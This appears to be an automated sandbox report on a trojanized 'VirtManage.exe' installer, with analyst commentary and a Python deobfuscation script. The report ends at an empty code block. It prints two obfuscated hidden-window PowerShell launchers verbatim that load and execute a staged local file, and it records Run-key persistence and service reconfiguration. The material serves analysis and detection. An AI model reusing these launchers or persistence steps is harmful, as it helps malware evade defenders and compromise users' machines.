Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\VirtManage.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: I Agree
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\msiexec.exe | Window detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: VirtManage.exe | Static PE information: certificate valid
Source: VirtManage.exe | Static file information: File size 10539568 > 1048576
Source: VirtManage.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdbhP source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdbhP source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdb source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdb source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Source: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"
Source: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle Hidden -command "SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"
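The two launchers above never name a cmdlet or method directly: every name is a wildcard resolved at run time against the live PowerShell session (`-clike`/`-ilike` filters over `Get-Member` output, `Get-Command *e-*press*`, `GetCommandName('N*ct', ...)`, `Item Variable:\*uti*t`), and the only string literal, the staged file path, is split into `$('C:\Progr'+'amData'+...)` fragments. The `(… | GM)[6].Name` index is the seventh member `Get-Member` prints for `$ExecutionContext`, which is `InvokeCommand`; `dir rid*` is filler that contributes nothing to the chain. Read with the wildcards resolved, both commands do the same thing: `New-Object Net.WebClient`, `DownloadString` of a local `.t` file dropped next to `winapi.exe` (WebClient accepts a plain file path), and execution of the returned text in memory via `Invoke-Expression` (first launcher) or `$ExecutionContext.InvokeCommand.InvokeScript` (second). The script below is an added example, not part of the sandbox output: it rebuilds the concatenated path and resolves each wildcard against the member lists of the .NET types involved. The `ENGINE_INTRINSICS` list is in the exact order `Get-Member` prints it, which the `[6]` index depends on; the `COMMAND_INVOCATION` and `WEBCLIENT` lists are real member names trimmed to what is needed here, and the cmdlet and variable universes are constructed stand-ins for what `Get-Command` and `Get-Variable` would return in a real session.

```python
"""Resolve the wildcard-member obfuscation in the two winapi.exe PowerShell
launchers from the report. Added example; the launcher strings are copied
from the report rows, the member lists are described in the lead-in."""
import re
from fnmatch import fnmatchcase

# $ExecutionContext members in the order Get-Member prints them (methods,
# then properties, each alphabetical); index 6 is InvokeCommand.
ENGINE_INTRINSICS = ["Equals", "GetHashCode", "GetType", "ToString", "Events",
                     "Host", "InvokeCommand", "InvokeProvider", "SessionState"]
# $ExecutionContext.InvokeCommand members (CommandInvocationIntrinsics), trimmed.
COMMAND_INVOCATION = ["Equals", "ExpandString", "GetCmdlet", "GetCmdletByTypeName",
                      "GetCommand", "GetCommandName", "GetCommands", "GetHashCode",
                      "GetType", "InvokeScript", "NewScriptBlock", "ToString",
                      "CommandNotFoundAction", "HasErrors", "LocationChangedAction",
                      "PostCommandLookupAction", "PreCommandLookupAction"]
# System.Net.WebClient members, trimmed.
WEBCLIENT = ["CancelAsync", "Dispose", "DownloadData", "DownloadDataAsync",
             "DownloadFile", "DownloadFileAsync", "DownloadString",
             "DownloadStringAsync", "OpenRead", "OpenWrite", "UploadData",
             "UploadFile", "UploadString", "UploadValues", "BaseAddress",
             "Credentials", "Encoding", "Headers", "Proxy", "ResponseHeaders"]
MEMBERS = ENGINE_INTRINSICS + COMMAND_INVOCATION + WEBCLIENT
# Constructed stand-ins for Get-Command / Get-Variable output (assumption).
CMDLETS = ["Invoke-Expression", "Invoke-WebRequest", "Invoke-Command", "New-Object",
           "New-Item", "Set-Variable", "Get-Command", "Get-Item"]
VARIABLES = ["ExecutionContext", "PSVersionTable", "Host", "Error", "PSHome"]


def resolve(pattern, universe, case_sensitive=False):
    """PowerShell -clike / -ilike wildcard semantics (* ? [..]) via fnmatch."""
    if case_sensitive:
        return sorted({n for n in universe if fnmatchcase(n, pattern)})
    return sorted({n for n in universe if fnmatchcase(n.lower(), pattern.lower())})


def join_concat(script):
    """Rebuild $('a'+'b'+...) string-concatenation literals into one literal."""
    def pieces(m):
        return "'" + "".join(re.findall(r"'([^']*)'", m.group(1))) + "'"
    return re.sub(r"\$\(((?:'[^']*'\s*\+\s*)+'[^']*')\)", pieces, script)


def decode(script):
    """Recover the staged file path and every wildcard-resolved name."""
    s = join_concat(script)
    out = {"staged_path": None, "gm_index": None, "resolved": {}}
    m = re.search(r"'([A-Za-z]:\\[^']+)'", s)
    if m:
        out["staged_path"] = m.group(1)
    m = re.search(r"\|GM\)\[(\d+)\]", s)          # ($ExecutionContext|GM)[n].Name
    if m:
        out["gm_index"] = ENGINE_INTRINSICS[int(m.group(1))]
    todo = [(p, MEMBERS, True) for p in re.findall(r"-clike\s*'([^']*)'", s)]
    todo += [(p, MEMBERS, False) for p in re.findall(r"-ilike\s*'([^']*)'", s)]
    todo += [(p, CMDLETS, False) for p in re.findall(r"Get-Command\s+([^\s()]+)", s)]
    todo += [(p, CMDLETS, False)
             for p in re.findall(r"(?:GetCommandName|Invoke)\('([^']*)',1", s)]
    todo += [(p, VARIABLES, False)
             for p in re.findall(r"Variable:[\\/]([^\s().]+)", s) if "*" in p]
    for pat, universe, cs in todo:
        out["resolved"][pat] = resolve(pat, universe, cs)
    return out


def summarize(script):
    """One-line reading of the launcher once every wildcard is resolved."""
    d = decode(script)
    names = {n for hits in d["resolved"].values() for n in hits}
    fetch = next((n for n in names if n.startswith("Download")), "?")
    runner = next((n for n in ("Invoke-Expression", "InvokeScript") if n in names), "?")
    return f"New-Object Net.WebClient -> {fetch}({d['staged_path']}) -> {runner}"


# The -command bodies from the two winapi.exe rows above, verbatim.
LAUNCHER_1 = r"""SV 5pW $('C:\Progr'+'amData\Micr'+'osoft\Micro'+'softAPI\ieQ'+'u4aeD'+'3u.t');Set-Item Variable:\Sh 'Net.WebClient';dir rid*;Set-Variable 7 (.(Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name)|GM|Where-Object{(Variable _ -ValueO).Name-clike'*dl*t'}).Name).Invoke((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).(((Item Variable:\*uti*t).Value.(((Item Variable:\*uti*t).Value|GM)[6].Name).PsObject.Methods|Where-Object{(Variable _ -ValueO).Name-clike'*nd*e'}).Name).Invoke('N*ct',1,$TRUE))(GV Sh).Value);Set-Variable GPW ((((Variable 7).Value|GM)|Where-Object{(Variable _ -ValueO).Name-clike'D*g'}).Name);.(Get-Command *e-*press*)((Variable 7).Value.((GCI Variable:/GPW).Value).Invoke((GV 5pW -ValueO)))"""
LAUNCHER_2 = r"""SI Variable:zX 'Net.WebClient';Set-Variable G8E $('C:\Pro'+'gramDat'+'a\Micro'+'soft\Update'+'Desktop\eep6d'+'i0uGu.t');dir rid*;Set-Variable kAl (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'G*d'}).Name).Invoke($ExecutionContext.InvokeCommand.GetCommandName('N*-O*',1,1),[System.Management.Automation.CommandTypes]::Cmdlet)(GI Variable:\zX).Value);Set-Item Variable:/75 ((((DIR Variable:\kAl).Value|Member)|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'D*g'}).Name);$ExecutionContext|ForEach{(Get-Item Variable:/_).Value.InvokeCommand.(($ExecutionContext.InvokeCommand|Member|Where-Object{(Get-Item Variable:/_).Value.Name-ilike'*ke*pt'}).Name).Invoke((DIR Variable:\kAl).Value.((GV 75 -Va)).Invoke((ChildItem Variable:/G8E).Value))}"""

if __name__ == "__main__":
    for launcher in (LAUNCHER_1, LAUNCHER_2):
        print(summarize(launcher))
```

Every wildcard in both launchers resolves to exactly one name against these lists, which is what makes the trick reliable for the attacker and cheap to undo for the analyst: the same resolution can be done live in a disposable session by replacing each `Where-Object{...}` with a `Get-Member` call, without ever running the final `Invoke-Expression`. The static hunt artefacts that survive this obfuscation are the `-windowstyle Hidden -command` prefix, the `|GM)[6]` index, the `Variable:\*...*` provider wildcards, and the `.t` file under the same `C:\ProgramData\Microsoft\...` directory as `winapi.exe`.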
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\e3jseyke.cmdline"
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_004014F0 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress | 1_2_004014F0
Source: libgcrypt-20.dll.0.dr | Static PE information: section name: /4
Source: libgpg-error-0.dll.0.dr | Static PE information: section name: /4
Source: libnpth-0.dll.0.dr | Static PE information: section name: /4
Source: libsqlite3-0.dll.0.dr | Static PE information: section name: /4
Source: zlib1.dll.0.dr | Static PE information: section name: /4
Source: gpg-agent.exe.0.dr | Static PE information: section name: /4
Source: gpg.exe.0.dr | Static PE information: section name: /4
Source: libassuan-9.dll.0.dr | Static PE information: section name: /4
Source: winapi.exe.0.dr | Static PE information: section name: fothk
Source: aclui.dll.0.dr | Static PE information: section name: .xdata
Source: aclui.dll.0.dr | Static PE information: section name: /4
Source: aclui.dll.0.dr | Static PE information: section name: /19
Source: aclui.dll.0.dr | Static PE information: section name: /31
Source: aclui.dll.0.dr | Static PE information: section name: /45
Source: aclui.dll.0.dr | Static PE information: section name: /57
Source: aclui.dll.0.dr | Static PE information: section name: /70
Source: aclui.dll.0.dr | Static PE information: section name: /81
Source: aclui.dll.0.dr | Static PE information: section name: /97
Source: aclui.dll.0.dr | Static PE information: section name: /113
Source: aclui-2.dll.16.dr | Static PE information: section name: .xdata
Source: aclui-2.dll.16.dr | Static PE information: section name: /4
Source: aclui-2.dll.16.dr | Static PE information: section name: /19
Source: aclui-2.dll.16.dr | Static PE information: section name: /31
Source: aclui-2.dll.16.dr | Static PE information: section name: /45
Source: aclui-2.dll.16.dr | Static PE information: section name: /57
Source: aclui-2.dll.16.dr | Static PE information: section name: /70
Source: aclui-2.dll.16.dr | Static PE information: section name: /81
Source: aclui-2.dll.16.dr | Static PE information: section name: /97
Source: aclui-2.dll.16.dr | Static PE information: section name: /113
Source: aclui.dll.16.dr | Static PE information: section name: .xdata
Source: aclui.dll.16.dr | Static PE information: section name: /4
Source: aclui.dll.16.dr | Static PE information: section name: /19
Source: aclui.dll.16.dr | Static PE information: section name: /31
Source: aclui.dll.16.dr | Static PE information: section name: /45
Source: aclui.dll.16.dr | Static PE information: section name: /57
Source: aclui.dll.16.dr | Static PE information: section name: /70
Source: aclui.dll.16.dr | Static PE information: section name: /81
Source: aclui.dll.16.dr | Static PE information: section name: /97
Source: aclui.dll.16.dr | Static PE information: section name: /113
Source: winapi.exe.16.dr | Static PE information: section name: fothk
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 1_2_0049816A push 89FFF8EBh; ret | 1_2_00498179
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | Code function: 3_2_0049816A push 89FFF8EBh; ret | 3_2_00498179
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg-agent.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\libassuan-9.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI2C66.tmp
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\e3jseyke.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\libgcrypt-20.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\libnpth-0.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\libsqlite3-0.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsExec.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\UpdateDesktop\aclui.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSI2CE4.tmp
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\libgpg-error-0.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\zlib1.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\aclui-2.dll
Source: C:\ProgramData\Microsoft\MicrosoftAPI\7za.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\winapi.exe
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\Users\user\AppData\Local\Temp\nsrFD0A.tmp\nsis7z.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe | File created: C:\ProgramData\Microsoft\MicrosoftAPI\7za.dll
Source: C:\Users\user\Desktop\VirtManage.exe | File created: C:\ProgramData\Microsoft\UpdateDesktop\winapi.exe

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe"
Source: C:\Users\user\Desktop\VirtManage.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleview
Source: C:\Users\user\Desktop\VirtManage.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateOleview
Source: C:\Users\user\Desktop\VirtManage.exe | Process created: C:\Windows\SysWOW64\sc.exe sc config msdtc start= demand
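The persistence chain this section records is small enough to turn directly into host-telemetry rules: the installer writes a `Run` value named `UpdateOleview` under `HKLM`, the binaries it dropped under `C:\ProgramData\Microsoft\...` start `powershell.exe -windowstyle Hidden` (the launchers in the Data Obfuscation section), and the installer reconfigures a service start type with `sc config msdtc start= demand`. The rules below are an added example and not part of the report; the events they run over are constructed in Sysmon field names (EventID 1 process creation, EventID 13 registry value set). The report shows only the `Run` value name, so the value data pointing at `winapi.exe` in the sample event is an assumption.

```python
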